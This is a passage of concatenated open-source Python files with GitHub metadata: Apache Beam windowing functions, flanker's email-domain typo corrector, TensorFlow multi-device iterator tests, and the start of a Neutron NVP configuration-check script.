self.timestamp = Timestamp.of(timestamp)
self.element = element
@abc.abstractmethod
def assign(self, assign_context):
"""Associates a timestamp to an element."""
raise NotImplementedError
class MergeContext(object):
"""Context passed to WindowFn.merge() to perform merging, if any."""
def __init__(self, windows):
self.windows = list(windows)
def merge(self, to_be_merged, merge_result):
raise NotImplementedError
@abc.abstractmethod
def merge(self, merge_context):
"""Returns a window that is the result of merging a set of windows."""
raise NotImplementedError
def is_merging(self):
"""Returns whether this WindowFn merges windows."""
return True
@abc.abstractmethod
def get_window_coder(self):
raise NotImplementedError
def get_transformed_output_time(self, window, input_timestamp): # pylint: disable=unused-argument
"""Given input time and output window, returns output time for window.
If TimestampCombiner.OUTPUT_AT_EARLIEST_TRANSFORMED is used in the
Windowing, the output timestamp for the given window will be the earliest
of the timestamps returned by get_transformed_output_time() for elements
of the window.
Arguments:
window: Output window of element.
input_timestamp: Input timestamp of element as a timeutil.Timestamp
object.
Returns:
Transformed timestamp.
"""
# By default, just return the input timestamp.
return input_timestamp
urns.RunnerApiFn.register_pickle_urn(urns.PICKLED_WINDOW_FN)
class BoundedWindow(object):
"""A window for timestamps in range (-infinity, end).
Attributes:
end: End of window.
"""
def __init__(self, end):
self.end = Timestamp.of(end)
def max_timestamp(self):
return self.end.predecessor()
def __cmp__(self, other):
# Order first by endpoint, then arbitrarily.
return cmp(self.end, other.end) or cmp(hash(self), hash(other))
def __eq__(self, other):
raise NotImplementedError
def __hash__(self):
return hash(self.end)
def __repr__(self):
return '[?, %s)' % float(self.end)
class IntervalWindow(BoundedWindow):
"""A window for timestamps in range [start, end).
Attributes:
start: Start of window as seconds since Unix epoch.
end: End of window as seconds since Unix epoch.
"""
def __init__(self, start, end):
super(IntervalWindow, self).__init__(end)
self.start = Timestamp.of(start)
def __hash__(self):
return hash((self.start, self.end))
def __eq__(self, other):
return self.start == other.start and self.end == other.end
def __repr__(self):
return '[%s, %s)' % (float(self.start), float(self.end))
def intersects(self, other):
return other.start < self.end or self.start < other.end
def union(self, other):
return IntervalWindow(
min(self.start, other.start), max(self.end, other.end))
class TimestampedValue(object):
"""A timestamped value having a value and a timestamp.
Attributes:
value: The underlying value.
timestamp: Timestamp associated with the value as seconds since Unix epoch.
"""
def __init__(self, value, timestamp):
self.value = value
self.timestamp = Timestamp.of(timestamp)
def __cmp__(self, other):
if type(self) is not type(other):
return cmp(type(self), type(other))
return cmp((self.value, self.timestamp), (other.value, other.timestamp))
class GlobalWindow(BoundedWindow):
"""The default window into which all data is placed (via GlobalWindows)."""
_instance = None
def __new__(cls):
if cls._instance is None:
cls._instance = super(GlobalWindow, cls).__new__(cls)
return cls._instance
def __init__(self):
super(GlobalWindow, self).__init__(MAX_TIMESTAMP)
self.start = MIN_TIMESTAMP
def __repr__(self):
return 'GlobalWindow'
def __hash__(self):
return hash(type(self))
def __eq__(self, other):
# Global windows are always and only equal to each other.
return self is other or type(self) is type(other)
class NonMergingWindowFn(WindowFn):
def is_merging(self):
return False
def merge(self, merge_context):
pass # No merging.
class GlobalWindows(NonMergingWindowFn):
"""A windowing function that assigns everything to one global window."""
@classmethod
def windowed_value(cls, value, timestamp=MIN_TIMESTAMP):
return WindowedValue(value, timestamp, (GlobalWindow(),))
def assign(self, assign_context):
return [GlobalWindow()]
def get_window_coder(self):
return coders.GlobalWindowCoder()
def __hash__(self):
return hash(type(self))
def __eq__(self, other):
# A GlobalWindows windowfn is only ever equal to another GlobalWindows.
return self is other or type(self) is type(other)
def __ne__(self, other):
return not self == other
def to_runner_api_parameter(self, context):
return urns.GLOBAL_WINDOWS_FN, None
@urns.RunnerApiFn.register_urn(urns.GLOBAL_WINDOWS_FN, None)
def from_runner_api_parameter(unused_fn_parameter, unused_context):
return GlobalWindows()
class FixedWindows(NonMergingWindowFn):
"""A windowing function that assigns each element to one time interval.
The attributes size and offset determine in what time interval a timestamp
will be slotted. The time intervals have the following formula:
[N * size + offset, (N + 1) * size + offset)
Attributes:
size: Size of the window as seconds.
offset: Offset of this window as seconds since Unix epoch. Windows start at
t=N * size + offset where t=0 is the epoch. The offset must be a value
in the range [0, size). If it is not, it will be normalized to this range.
"""
def __init__(self, size, offset=0):
if size <= 0:
raise ValueError('The size parameter must be strictly positive.')
self.size = Duration.of(size)
self.offset = Timestamp.of(offset) % self.size
def assign(self, context):
timestamp = context.timestamp
start = timestamp - (timestamp - self.offset) % self.size
return [IntervalWindow(start, start + self.size)]
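# Worked example (illustrative, not part of the original source): with size=60
# and offset=0, an element at timestamp 125 gets
# start = 125 - (125 - 0) % 60 = 120, i.e. the single window [120, 180).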
def get_window_coder(self):
return coders.IntervalWindowCoder()
def __eq__(self, other):
if type(self) == type(other) == FixedWindows:
return self.size == other.size and self.offset == other.offset
def __ne__(self, other):
return not self == other
def to_runner_api_parameter(self, context):
return (urns.FIXED_WINDOWS_FN,
proto_utils.pack_Struct(size=self.size.micros,
offset=self.offset.micros))
@urns.RunnerApiFn.register_urn(urns.FIXED_WINDOWS_FN, struct_pb2.Struct)
def from_runner_api_parameter(fn_parameter, unused_context):
return FixedWindows(
size=Duration(micros=fn_parameter['size']),
offset=Timestamp(micros=fn_parameter['offset']))
class SlidingWindows(NonMergingWindowFn):
"""A windowing function that assigns each element to a set of sliding windows.
The attributes size and offset determine in what time interval a timestamp
will be slotted. The time intervals have the following formula:
[N * period + offset, N * period + offset + size)
Attributes:
size: Size of the window as seconds.
period: Period of the windows as seconds.
offset: Offset of this window as seconds since Unix epoch. Windows start at
t=N * period + offset where t=0 is the epoch. The offset must be a value
in the range [0, period). If it is not, it will be normalized to this range.
"""
def __init__(self, size, period, offset=0):
if size <= 0:
raise ValueError('The size parameter must be strictly positive.')
self.size = Duration.of(size)
self.period = Duration.of(period)
self.offset = Timestamp.of(offset) % period
def assign(self, context):
timestamp = context.timestamp
start = timestamp - ((timestamp - self.offset) % self.period)
return [
IntervalWindow(Timestamp(micros=s), Timestamp(micros=s) + self.size)
for s in range(start.micros, timestamp.micros - self.size.micros,
-self.period.micros)]
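# Worked example (illustrative, not part of the original source): with size=10,
# period=5 and offset=0, an element at timestamp 12 gets
# start = 12 - (12 - 0) % 5 = 10 and is assigned to the sliding windows
# [10, 20) and [5, 15).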
def get_window_coder(self):
return coders.IntervalWindowCoder()
def __eq__(self, other):
if type(self) == type(other) == SlidingWindows:
return (self.size == other.size
and self.offset == other.offset
and self.period == other.period)
def to_runner_api_parameter(self, context):
return (urns.SLIDING_WINDOWS_FN,
proto_utils.pack_Struct(
size=self.size.micros,
offset=self.offset.micros,
period=self.period.micros))
@urns.RunnerApiFn.register_urn(urns.SLIDING_WINDOWS_FN, struct_pb2.Struct)
def from_runner_api_parameter(fn_parameter, unused_context):
return SlidingWindows(
size=Duration(micros=fn_parameter['size']),
offset=Timestamp(micros=fn_parameter['offset']),
period=Duration(micros=fn_parameter['period']))
class Sessions(WindowFn):
"""A windowing function that groups elements into sessions.
A session is defined as a series of consecutive events
separated by a specified gap size.
Attributes:
gap_size: Size of the gap between windows as floating-point seconds.
"""
def __init__(self, gap_size):
if gap_size <= 0:
raise ValueError('The size parameter must be strictly positive.')
self.gap_size = Duration.of(gap_size)
def assign(self, context):
timestamp = context.timestamp
return [IntervalWindow(timestamp, timestamp + self.gap_size)]
def get_window_coder(self):
return coders.IntervalWindowCoder()
def merge(self, merge_context):
to_merge = []
end = MIN_TIMESTAMP
for w in sorted(merge_context.windows, key=lambda w: w.start):
if to_merge:
if end > w.start:
to_merge.append(w)
if w.end > end:
end = w.end
else:
if len(to_merge) > 1:
merge_context.merge(to_merge,
IntervalWindow(to_merge[0].start, end))
to_merge = [w]
end = w.end
else:
to_merge = [w]
end = w.end
if len(to_merge) > 1:
merge_context.merge(to_merge, IntervalWindow(to_merge[0].start, end))
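# Worked example (illustrative, not part of the original source): with
# gap_size=10, elements at timestamps 1, 5 and 30 are first assigned to
# [1, 11), [5, 15) and [30, 40); merge() then combines the two overlapping
# windows into the session [1, 15) and leaves [30, 40) as its own session.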
def __eq__(self, other):
if type(self) == type(other) == Sessions:
return self.gap_size == other.gap_size
@urns.RunnerApiFn.register_urn(urns.SESSION_WINDOWS_FN, struct_pb2.Struct)
def from_runner_api_parameter(fn_parameter, unused_context):
return Sessions(gap_size=Duration(micros=fn_parameter['gap_size']))
def to_runner_api_parameter(self, context):
return (urns.SESSION_WINDOWS_FN,
proto_utils.pack_Struct(gap_size=self.gap_size.micros))
| {
"content_hash": "398f54e28c5518765e383f60cc7b2857",
"timestamp": "",
"source": "github",
"line_count": 444,
"max_line_length": 100,
"avg_line_length": 32.560810810810814,
"alnum_prop": 0.6971709206612714,
"repo_name": "dhalperi/incubator-beam",
"id": "94187e0c5d54d14b065431deb675f422f4fb9a3a",
"size": "15242",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sdks/python/apache_beam/transforms/window.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Groovy",
"bytes": "22449"
},
{
"name": "Java",
"bytes": "9735468"
},
{
"name": "Protocol Buffer",
"bytes": "1407"
},
{
"name": "Shell",
"bytes": "10104"
}
],
"symlink_target": ""
} |
"""
Spelling corrector library, used to correct common typos in domains like
gmal.com instead of gmail.com.
The spelling corrector uses difflib which in turn uses the
Ratcliff-Obershelp algorithm [1] to compute the similarity of two strings.
This is a very fast and accurate algorithm for domain spelling correction.
The (only) public method this module has is suggest(word), which given
a domain, suggests an alternative or returns the original domain
if no suggestion exists.
[1] http://xlinux.nist.gov/dads/HTML/ratcliffObershelp.html
"""
import difflib
def suggest(word, cutoff=0.77):
"""
Given a domain and a cutoff heuristic, suggest an alternative or return the
original domain if no suggestion exists.
"""
if word in LOOKUP_TABLE:
return LOOKUP_TABLE[word]
guess = difflib.get_close_matches(word, MOST_COMMON_DOMAINS, n=1, cutoff=cutoff)
if guess and len(guess) > 0:
return guess[0]
return word
MOST_COMMON_DOMAINS = [
# mailgun :)
'mailgun.net',
# big esps
'yahoo.com',
'yahoo.ca',
'yahoo.co.jp',
'yahoo.co.uk',
'yahoo.com.br',
'ymail.com',
'hotmail.com',
'hotmail.ca',
'hotmail.co.uk',
'windowslive.com',
'live.com',
'outlook.com',
'msn.com',
'gmail.com',
'googlemail.com',
'aol.com',
'aim.com',
'icloud.com',
'me.com',
'mac.com',
'facebook.com',
# big isps
'comcast.net',
'sbcglobal.net',
'bellsouth.net',
'verizon.net',
'earthlink.net',
'cox.net',
'charter.net',
'shaw.ca',
'bell.net'
]
# domains that the difflib matching above doesn't fix but that we still want to fix
LOOKUP_TABLE = {
u'yahoo': u'yahoo.com',
u'gmail': u'gmail.com',
u'hotmail': u'hotmail.com',
u'live': u'live.com',
u'outlook': u'outlook.com',
u'msn': u'msn.com',
u'googlemail': u'googlemail.com',
u'aol': u'aol.com',
u'aim': u'aim.com',
u'icloud': u'icloud.com',
u'me': u'me.com',
u'mac': u'mac.com',
u'facebook': u'facebook.com',
u'comcast': u'comcast.net',
u'sbcglobal': u'sbcglobal.net',
u'bellsouth': u'bellsouth.net',
u'verizon': u'verizon.net',
u'earthlink': u'earthlink.net',
u'cox': u'cox.net',
u'charter': u'charter.net',
u'shaw': u'shaw.ca',
u'bell': u'bell.net'
}
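# Example usage (hypothetical session, added for illustration):
#
# suggest('gmal.com') -> 'gmail.com' (close difflib match above the cutoff)
# suggest('yahoo') -> 'yahoo.com' (resolved via LOOKUP_TABLE)
# suggest('example.org') -> 'example.org' (no close match, returned unchanged)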
| {
"content_hash": "e3a91de76b3fbd95f81facc00e1395b4",
"timestamp": "",
"source": "github",
"line_count": 94,
"max_line_length": 84,
"avg_line_length": 25.872340425531913,
"alnum_prop": 0.5916940789473685,
"repo_name": "xjzhou/flanker",
"id": "498862109e3ed629daceca4fec18aef0a18c579d",
"size": "2447",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "flanker/addresslib/corrector.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "370387"
}
],
"symlink_target": ""
} |
"""Tests for the `MultiDeviceIterator` and `OwnedMultiDeviceIterator` API."""
from absl.testing import parameterized
import numpy as np
from tensorflow.python.data.experimental.ops import testing
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import from_generator_op
from tensorflow.python.data.ops import multi_device_iterator_ops
from tensorflow.python.data.ops import options as options_lib
from tensorflow.python.eager import cancellation
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import executor
from tensorflow.python.framework import combinations
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
cls_combination = combinations.combine(cls=[
combinations.NamedObject("MultiDeviceIterator",
multi_device_iterator_ops.MultiDeviceIterator),
combinations.NamedObject("OwnedMultiDeviceIterator",
multi_device_iterator_ops.OwnedMultiDeviceIterator)
])
class MultiDeviceIteratorCommonTest(test_base.DatasetTestBase,
parameterized.TestCase):
"""Tests that are common to MultiDeviceIterator and OwnedMultiDeviceIterator."""
def setUp(self):
super().setUp()
self._devices = self.configureDevicesForMultiDeviceTest(3)
@combinations.generate(
combinations.times(test_base.eager_only_combinations(), cls_combination))
def testCancelGetNextWithDevice(self, cls):
ping = data_flow_ops.FIFOQueue(capacity=2, dtypes=dtypes.int64)
pong = data_flow_ops.FIFOQueue(capacity=2, dtypes=dtypes.int64)
@def_function.function
def map_fn(v):
ball = ping.dequeue()
with ops.control_dependencies([pong.enqueue(ball)]):
return v + ping.dequeue()
dataset = dataset_ops.Dataset.range(10)
dataset = dataset.map(map_fn)
# We need to set prefetch_buffer_size=0 so that we can cancel the
# MultiDeviceIteratorGetNextFromShardOp from eager. If
# prefetch_buffer_size>0, that op runs in the background threads of the
# prefetch and can only be cancelled by deleting the iterator.
multi_device_iterator = cls(
dataset, [self._devices[1], self._devices[2]], prefetch_buffer_size=0)
@def_function.function
def get_next_device1():
return multi_device_iterator.get_next(self._devices[1])
async_executor = executor.new_executor(enable_async=True)
with context.executor_scope(async_executor):
cancel_mgr = cancellation.CancellationManager()
cancel_mgr.get_cancelable_function(
get_next_device1.get_concrete_function())()
# Make sure we cancel in the middle of get_next.
ping.enqueue(0)
pong.dequeue()
cancel_mgr.start_cancel()
with self.assertRaises(errors.CancelledError):
async_executor.wait()
# Note that fetching from the upstream iterator is not cancelled with the
# cancellation of get_next.
ping.enqueue(0)
# Cancelling a get_next on one device shouldn't cancel the
# multi_device_iterator and iterators on other devices.
ping.enqueue(0)
ping.enqueue(0)
self.assertEqual(1,
multi_device_iterator.get_next(self._devices[2]).numpy())
# FIXME(b/209534797): Work around an ASan error caused by this test.
# Remove the dangling reference from tf.function to ensure queue objects
# are not freed before they are flushed.
import gc # pylint: disable=g-import-not-at-top
del get_next_device1
gc.collect()
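# Illustrative note (not part of the original test): the ping/pong queues above
# let the test hold map_fn blocked on its second ping.dequeue() call, which
# guarantees that start_cancel() fires while the get_next computation is still
# in flight rather than after it has finished.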
@combinations.generate(
combinations.times(test_base.eager_only_combinations(), cls_combination))
def testEmptyDataset(self, cls):
dataset = dataset_ops.Dataset.range(0)
multi_device_iterator = cls(
dataset, devices=[self._devices[1], self._devices[2]])
with self.assertRaises(errors.OutOfRangeError):
multi_device_iterator.get_next()
@combinations.generate(
combinations.times(test_base.eager_only_combinations(), cls_combination))
def testEmptyDeviceList(self, cls):
dataset = dataset_ops.Dataset.range(10)
with self.assertRaisesRegex(
errors.InvalidArgumentError,
"Length for attr 'devices' of 0 must be at least minimum 1"):
cls(dataset, devices=[])
class MultiDeviceIteratorTest(test_base.DatasetTestBase,
parameterized.TestCase):
def setUp(self):
super(MultiDeviceIteratorTest, self).setUp()
self._devices = self.configureDevicesForMultiDeviceTest(3)
@combinations.generate(
combinations.times(test_base.default_test_combinations(),
combinations.combine(num_inits=[0, 1, 42])))
def testInitOnly(self, num_inits):
dataset = dataset_ops.Dataset.range(10)
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]])
for _ in range(num_inits):
self.evaluate(multi_device_iterator.initializer)
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(
max_buffer_size=[0, 1, 10], prefetch_buffer_size=[0, 1, 10])))
def testBasic(self, prefetch_buffer_size, max_buffer_size):
dataset = dataset_ops.Dataset.range(10)
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]],
max_buffer_size=max_buffer_size,
prefetch_buffer_size=prefetch_buffer_size)
self.evaluate(multi_device_iterator.initializer)
for i in range(0, 10, 2):
elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.assertEqual(i, self.evaluate(elem_on_1))
self.assertEqual(i + 1, self.evaluate(elem_on_2))
with self.assertRaises(errors.OutOfRangeError):
elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.evaluate(elem_on_1)
self.evaluate(elem_on_2)
@combinations.generate(test_base.default_test_combinations())
def testOneOnSameDevice(self):
dataset = dataset_ops.Dataset.range(12)
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[0], self._devices[1], self._devices[2]])
self.evaluate(multi_device_iterator.initializer)
for i in range(0, 12, 3):
elem_on_0, elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.assertEqual(i, self.evaluate(elem_on_0))
self.assertEqual(i + 1, self.evaluate(elem_on_1))
self.assertEqual(i + 2, self.evaluate(elem_on_2))
with self.assertRaises(errors.OutOfRangeError):
elem_on_0, elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.evaluate(elem_on_0)
self.evaluate(elem_on_1)
self.evaluate(elem_on_2)
@combinations.generate(test_base.default_test_combinations())
def testRepeatDevices(self):
dataset = dataset_ops.Dataset.range(10)
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[1], self._devices[1]])
self.evaluate(multi_device_iterator.initializer)
for i in range(0, 10, 2):
elements = multi_device_iterator.get_next()
elem_on_1, elem_on_2 = elements
self.assertEqual(i, self.evaluate(elem_on_1))
self.assertEqual(i + 1, self.evaluate(elem_on_2))
with self.assertRaises(errors.OutOfRangeError):
elements = multi_device_iterator.get_next()
elem_on_1, elem_on_2 = elements
self.evaluate(elem_on_1)
self.evaluate(elem_on_2)
@combinations.generate(test_base.default_test_combinations())
def testNotFullyDivisible(self):
dataset = dataset_ops.Dataset.range(9)
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]])
self.evaluate(multi_device_iterator.initializer)
for i in range(0, 8, 2):
elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.assertEqual(i, self.evaluate(elem_on_1))
self.assertEqual(i + 1, self.evaluate(elem_on_2))
elem_on_1 = multi_device_iterator.get_next(self._devices[1])
self.assertEqual(8, self.evaluate(elem_on_1))
with self.assertRaises(errors.OutOfRangeError):
elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.evaluate(elem_on_1)
self.evaluate(elem_on_2)
@combinations.generate(test_base.default_test_combinations())
def testGetNextAsOptional(self):
dataset = dataset_ops.Dataset.range(10)
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]])
self.evaluate(multi_device_iterator.initializer)
for i in range(0, 10, 2):
elem_on_1, elem_on_2 = multi_device_iterator.get_next_as_optional()
has_elem_1, get_elem_1 = self.evaluate(
[elem_on_1.has_value(), elem_on_1.get_value()])
has_elem_2, get_elem_2 = self.evaluate(
[elem_on_2.has_value(), elem_on_2.get_value()])
self.assertTrue(has_elem_1)
self.assertEqual(i, get_elem_1)
self.assertTrue(has_elem_2)
self.assertEqual(i + 1, get_elem_2)
elem_on_1, elem_on_2 = multi_device_iterator.get_next_as_optional()
has_elem_1 = elem_on_1.has_value()
has_elem_2 = elem_on_2.has_value()
self.assertFalse(self.evaluate(has_elem_1))
self.assertFalse(self.evaluate(has_elem_2))
with self.assertRaises(errors.InvalidArgumentError):
elem_1 = elem_on_1.get_value()
self.evaluate(elem_1)
with self.assertRaises(errors.InvalidArgumentError):
elem_2 = elem_on_2.get_value()
self.evaluate(elem_2)
@combinations.generate(test_base.default_test_combinations())
def testUneven(self):
dataset = dataset_ops.Dataset.range(10)
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]], max_buffer_size=4)
self.evaluate(multi_device_iterator.initializer)
for i in range(0, 10, 2):
elem_on_1 = multi_device_iterator.get_next(self._devices[1])
self.assertEqual(i, self.evaluate(elem_on_1))
for i in range(0, 10, 2):
elem_on_2 = multi_device_iterator.get_next(self._devices[2])
self.assertEqual(i + 1, self.evaluate(elem_on_2))
with self.assertRaises(errors.OutOfRangeError):
elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.evaluate(elem_on_1)
self.evaluate(elem_on_2)
@combinations.generate(test_base.graph_only_combinations())
def testMultipleInitializationsGraph(self):
dataset1 = dataset_ops.Dataset.range(1000)
dataset2 = dataset_ops.Dataset.range(1000)
dataset = dataset_ops.Dataset.zip((dataset1, dataset2))
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]], prefetch_buffer_size=4)
elem_on_1, elem_on_2 = multi_device_iterator.get_next()
for _ in range(5):
self.evaluate(multi_device_iterator.initializer)
self.assertEqual([(0, 0), (1, 1)], self.evaluate([elem_on_1, elem_on_2]))
@combinations.generate(test_base.eager_only_combinations())
def testMultipleInitializationsEager(self):
dataset1 = dataset_ops.Dataset.range(1000)
dataset2 = dataset_ops.Dataset.range(1000)
dataset = dataset_ops.Dataset.zip((dataset1, dataset2))
for _ in range(5):
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]], prefetch_buffer_size=4)
self.evaluate(multi_device_iterator.initializer)
elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.assertEqual([(0, 0), (1, 1)], self.evaluate([elem_on_1, elem_on_2]))
@combinations.generate(test_base.default_test_combinations())
def testOptimization(self):
dataset = dataset_ops.Dataset.range(10)
dataset = dataset.apply(testing.assert_next(["MemoryCacheImpl"]))
dataset = dataset.skip(0) # this should be optimized away
dataset = dataset.cache()
options = options_lib.Options()
options.experimental_optimization.noop_elimination = True
dataset = dataset.with_options(options)
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]])
self.evaluate(multi_device_iterator.initializer)
for i in range(0, 10, 2):
elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.assertEqual(i, self.evaluate(elem_on_1))
self.assertEqual(i + 1, self.evaluate(elem_on_2))
with self.assertRaises(errors.OutOfRangeError):
elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.evaluate(elem_on_1)
self.evaluate(elem_on_2)
class OwnedMultiDeviceIteratorTest(test_base.DatasetTestBase,
parameterized.TestCase):
def setUp(self):
super(OwnedMultiDeviceIteratorTest, self).setUp()
self._devices = self.configureDevicesForMultiDeviceTest(3)
@combinations.generate(
combinations.times(
test_base.eager_only_combinations(),
combinations.combine(
max_buffer_size=[0, 1, 10], prefetch_buffer_size=[0, 1, 10])))
def testBasic(self, max_buffer_size, prefetch_buffer_size):
dataset = dataset_ops.Dataset.range(1000)
mdi = multi_device_iterator_ops.OwnedMultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]],
max_buffer_size=max_buffer_size,
prefetch_buffer_size=prefetch_buffer_size)
for i, el in enumerate(mdi):
self.assertEqual([i * 2, i * 2 + 1], [el[0].numpy(), el[1].numpy()])
@combinations.generate(test_base.eager_only_combinations())
def testBasicFunction(self):
queue = data_flow_ops.FIFOQueue(10, dtypes.int64)
@def_function.function
def fn():
with ops.device(self._devices[0]):
dataset = dataset_ops.Dataset.range(10)
iterator = multi_device_iterator_ops.OwnedMultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]])
for _ in range(5):
el0, el1 = next(iterator)
queue.enqueue(el0)
queue.enqueue(el1)
fn()
for i in range(10):
self.assertEqual(queue.dequeue().numpy(), i)
@combinations.generate(test_base.eager_only_combinations())
def testFunctionError(self):
# In this test we verify that a function that raises an error ends up
# properly deallocating the iterator resource.
queue = data_flow_ops.FIFOQueue(10, dtypes.int64)
queue.enqueue(0)
def init_fn(n):
return n
def next_fn(_):
ds = dataset_ops.Dataset.range(0)
return next(iter(ds))
def finalize_fn(n):
queue.enqueue(0)
return n
@def_function.function
def fn():
dataset = from_generator_op._GeneratorDataset(
1,
init_fn,
next_fn,
finalize_fn,
output_signature=tensor_spec.TensorSpec([], dtypes.int64))
iterator = multi_device_iterator_ops.OwnedMultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]])
next(iterator)
with self.assertRaises(errors.OutOfRangeError):
fn()
self.assertEqual(queue.size().numpy(), 2)
@combinations.generate(test_base.eager_only_combinations())
def testMultipleInitializations(self):
dataset = dataset_ops.Dataset.range(1000)
for _ in range(5):
multi_device_iterator = (
multi_device_iterator_ops.OwnedMultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]]))
for i, el in enumerate(multi_device_iterator):
self.assertEqual([i * 2, i * 2 + 1], [el[0].numpy(), el[1].numpy()])
@combinations.generate(test_base.eager_only_combinations())
def testLimitedRetracing(self):
trace_count = [0]
@def_function.function
def f(iterator):
trace_count[0] += 1
counter = np.int64(0)
for _ in range(5):
elem = next(iterator)
counter += elem[0]
counter += elem[1]
return counter
dataset = dataset_ops.Dataset.range(10)
dataset2 = dataset_ops.Dataset.range(20)
for _ in range(10):
multi_device_iterator = (
multi_device_iterator_ops.OwnedMultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]]))
self.assertEqual(self.evaluate(f(multi_device_iterator)), 45)
multi_device_iterator2 = (
multi_device_iterator_ops.OwnedMultiDeviceIterator(
dataset2, [self._devices[1], self._devices[2]]))
self.assertEqual(self.evaluate(f(multi_device_iterator2)), 45)
self.assertEqual(trace_count[0], 1)
@combinations.generate(test_base.eager_only_combinations())
def testMissingDevices(self):
dataset = dataset_ops.Dataset.range(1000)
with self.assertRaisesRegex(ValueError, "`devices` must be provided."):
multi_device_iterator_ops.OwnedMultiDeviceIterator(dataset)
@combinations.generate(test_base.eager_only_combinations())
def testMissingInput(self):
with self.assertRaisesRegex(
ValueError,
"When `dataset` is not provided, both `components` and `element_spec` "
"must be specified."):
multi_device_iterator_ops.OwnedMultiDeviceIterator(
dataset=None, devices=[self._devices[1], self._devices[2]])
@combinations.generate(test_base.eager_only_combinations())
def testExtraElementSpecInput(self):
dataset = dataset_ops.Dataset.range(1000)
with self.assertRaisesRegex(
ValueError,
"When `dataset` is provided, `element_spec` and `components` must "
"not be specified."):
multi_device_iterator_ops.OwnedMultiDeviceIterator(
dataset, devices=[self._devices[1], self._devices[2]],
element_spec=dataset.element_spec)
@combinations.generate(test_base.graph_only_combinations())
def testGraphMode(self):
dataset = dataset_ops.Dataset.range(1000)
with self.assertRaisesRegex(
RuntimeError,
"OwnedMultiDeviceIterator is only supported inside of tf.function or "
"when eager execution is enabled."):
multi_device_iterator_ops.OwnedMultiDeviceIterator(
dataset, devices=[self._devices[1], self._devices[2]])
if __name__ == "__main__":
test.main()
| {
"content_hash": "7fbad2617c48dad5e29dc3fc560aa4c7",
"timestamp": "",
"source": "github",
"line_count": 462,
"max_line_length": 82,
"avg_line_length": 40.108225108225106,
"alnum_prop": 0.6859686994063681,
"repo_name": "tensorflow/tensorflow",
"id": "a544842f4c45beeead44230473c990413b1fc0a2",
"size": "19219",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "tensorflow/python/data/kernel_tests/multi_device_iterator_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "36962"
},
{
"name": "C",
"bytes": "1400913"
},
{
"name": "C#",
"bytes": "13584"
},
{
"name": "C++",
"bytes": "126099822"
},
{
"name": "CMake",
"bytes": "182430"
},
{
"name": "Cython",
"bytes": "5003"
},
{
"name": "Dockerfile",
"bytes": "416133"
},
{
"name": "Go",
"bytes": "2129888"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "1074438"
},
{
"name": "Jupyter Notebook",
"bytes": "792906"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "11447433"
},
{
"name": "Makefile",
"bytes": "2760"
},
{
"name": "Objective-C",
"bytes": "172666"
},
{
"name": "Objective-C++",
"bytes": "300213"
},
{
"name": "Pawn",
"bytes": "5552"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "42782002"
},
{
"name": "Roff",
"bytes": "5034"
},
{
"name": "Ruby",
"bytes": "9199"
},
{
"name": "Shell",
"bytes": "621854"
},
{
"name": "Smarty",
"bytes": "89538"
},
{
"name": "SourcePawn",
"bytes": "14625"
},
{
"name": "Starlark",
"bytes": "7738020"
},
{
"name": "Swift",
"bytes": "78435"
},
{
"name": "Vim Snippet",
"bytes": "58"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import sys
from oslo.config import cfg
from neutron.common import config
from neutron.plugins.nicira.common import config as nvp_cfg # noqa
from neutron.plugins.nicira import NeutronPlugin
from neutron.plugins.nicira import nvplib
config.setup_logging(cfg.CONF)
def help(name):
print("Usage: %s path/to/nvp.ini" % name)
sys.exit(1)
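# Illustrative invocation (added for clarity; the path is only an example):
#
# python check_nvp_config.py /etc/neutron/plugins/nicira/nvp.ini
#
# The script prints the effective database, NVP and cluster options, then exits
# non-zero if the configured default gateway services or transport zone cannot
# be found on the NVP backend.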
def get_gateway_services(cluster):
